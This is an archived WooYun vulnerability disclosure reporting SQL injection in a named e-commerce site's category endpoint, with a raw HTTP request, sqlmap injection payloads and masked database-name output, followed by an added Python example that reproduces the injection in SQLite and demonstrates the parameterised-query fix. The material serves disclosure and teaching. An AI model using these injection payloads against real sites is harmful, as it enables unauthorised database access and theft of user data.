WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-25: Details reported to the vendor, awaiting vendor handling
2015-12-25: Vendor has confirmed; details disclosed to the vendor only
2016-01-04: Details disclosed to core white hats and relevant domain experts
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public
Christmas is here... any presents?
POST request:
POST /Category/getBrotherCategoryListByPid HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chunbo.com:80/
Cookie: PHPSESSID=b7g95km28gmlkuuj1ifumi2av6; cb_site_id=1; cb_site_name=%E5%8C%97%E4%BA%AC; cb_is_reg_info=1; _pk_ref.1151.b7bb=%5B%22%22%2C%22%22%2C1450954569%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1151.b7bb=5ffe0accbe4f2f4e.1450954569.1.1450954569.1450954569.; _pk_ses.1151.b7bb=*
Host: www.chunbo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

pid=188&site_id=1
Both the pid parameter and the site_id parameter are injectable.
Of these, memberdb is the one that stores user information.
Had a look at the columns.
POST parameter 'site_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=188) AND 6610=6610 AND (6333=6333&site_id=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: pid=188) AND (SELECT * FROM (SELECT(SLEEP(5)))SSlX) AND (8244=8244&site_id=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: pid=188) UNION ALL SELECT CONCAT(0x7162767a71,0x4a476f735370726c4a57,0x7176767a71),NULL,NULL-- &site_id=1

Parameter: site_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=188&site_id=1 AND 2328=2328

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: pid=188&site_id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x6d63564b494a6374424f,0x7176767a71),NULL-- 
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: pid, type: Unescaped numeric (default)
[1] place: POST, parameter: site_id, type: Unescaped numeric
[q] Quit
> 0
[18:59:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.29, PHP 5.5.30
back-end DBMS: MySQL 5.0.12
[18:59:50] [INFO] fetching database names
available databases [14]:
(masked region)
*****dmi*****
*****alog*****
*****msd*****
*****onf*****
*****kboo*****
*****ron*****
*****ron*****
*****tion_s*****
*****fore*****
*****emb*****
*****miss*****
*****moti*****
*****evi*****
t*****
[18:59:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.chunbo.com'
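Added example, not code from this report or from chunbo.com: the sqlmap output above classifies both parameters as "Unescaped numeric" and its payloads reveal the query shape (three selected columns, a parenthesised WHERE over pid and site_id, both pasted in unquoted). The script below rebuilds that shape against an in-memory SQLite table with constructed rows, runs the report's boolean-based payload, a constructed false counterpart, and the report's UNION payload against it, and then shows the fix: an integer cast plus bound parameters. The table name, column names, sample rows and exact query text are assumptions. sqlmap's 0x... literals are ASCII delimiters that MySQL evaluates as strings; SQLite reads them as integers and (before 3.44) has no CONCAT, so the UNION payload is rewritten with quoted strings joined by || after decoding those literals.

```python
# Added example (not from the WooYun report or chunbo.com). Table name, columns,
# sample rows and the exact query text are assumptions inferred from the payloads.
import re
import sqlite3

# Constructed sample rows: (id, pid, site_id, name).
ROWS = [
    (1, 188, 1, "Fruit"),
    (2, 188, 1, "Vegetables"),
    (3, 188, 2, "Dairy"),
    (4, 200, 1, "Drinks"),
]

# pid values copied from the report's sqlmap output (site_id stays 1).
TRUE_PAYLOAD = "188) AND 6610=6610 AND (6333=6333"
# Constructed false counterpart: same shape, failing condition. Boolean-based
# blind extraction tells bits apart by comparing these two responses.
FALSE_PAYLOAD = "188) AND 6610=6611 AND (6333=6333"
REPORT_UNION_PAYLOAD = (
    "188) UNION ALL SELECT "
    "CONCAT(0x7162767a71,0x4a476f735370726c4a57,0x7176767a71),NULL,NULL-- "
)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (id INTEGER, pid INTEGER, site_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?, ?, ?)", ROWS)
    return conn


def vulnerable_query(conn, pid, site_id):
    """The bug: request parameters pasted into SQL as bare numerics ("unescaped numeric")."""
    sql = (
        "SELECT id, name, site_id FROM category "
        f"WHERE (pid = {pid} AND site_id = {site_id})"
    )
    return conn.execute(sql).fetchall()


def safe_query(conn, pid, site_id):
    """The fix: cast to int (rejects anything but digits) and bind the values."""
    sql = "SELECT id, name, site_id FROM category WHERE (pid = ? AND site_id = ?)"
    return conn.execute(sql, (int(pid), int(site_id))).fetchall()


def safe_query_rejects(conn, pid, site_id):
    """True if safe_query refuses the input before any SQL is built."""
    try:
        safe_query(conn, pid, site_id)
    except ValueError:
        return True
    return False


def decode_hex_literals(payload):
    """sqlmap's 0x... literals are ASCII delimiters it later searches for in the
    response; MySQL evaluates them as strings."""
    return [bytes.fromhex(h).decode("ascii") for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def sqlite_union_payload():
    """SQLite treats 0x literals as integers and (before 3.44) has no CONCAT,
    so rebuild the report's UNION payload with quoted strings joined by ||."""
    parts = decode_hex_literals(REPORT_UNION_PAYLOAD)
    return "188) UNION ALL SELECT " + "||".join(f"'{p}'" for p in parts) + ",NULL,NULL-- "


if __name__ == "__main__":
    db = make_db()
    print("normal      :", vulnerable_query(db, "188", "1"))
    print("true branch :", vulnerable_query(db, TRUE_PAYLOAD, "1"))
    print("false branch:", vulnerable_query(db, FALSE_PAYLOAD, "1"))
    print("union       :", vulnerable_query(db, sqlite_union_payload(), "1"))
    print("marker      :", "".join(decode_hex_literals(REPORT_UNION_PAYLOAD)))
    print("hardened    :", safe_query(db, "188", "1"), safe_query_rejects(db, TRUE_PAYLOAD, "1"))
```

Two things worth noticing when it runs. The UNION payload's trailing "-- " comments out the "AND site_id = 1)" remainder, so the attacker also drops the site filter and gets every pid=188 row plus the marker row; a 3-column UNION works only because the original SELECT has three columns, which is what sqlmap's "3 columns" title records. On the hardened side the cast alone already stops these payloads, but binding the parameters is what makes the fix hold for string columns too.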
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-12-25 13:47
Thank you.
None yet.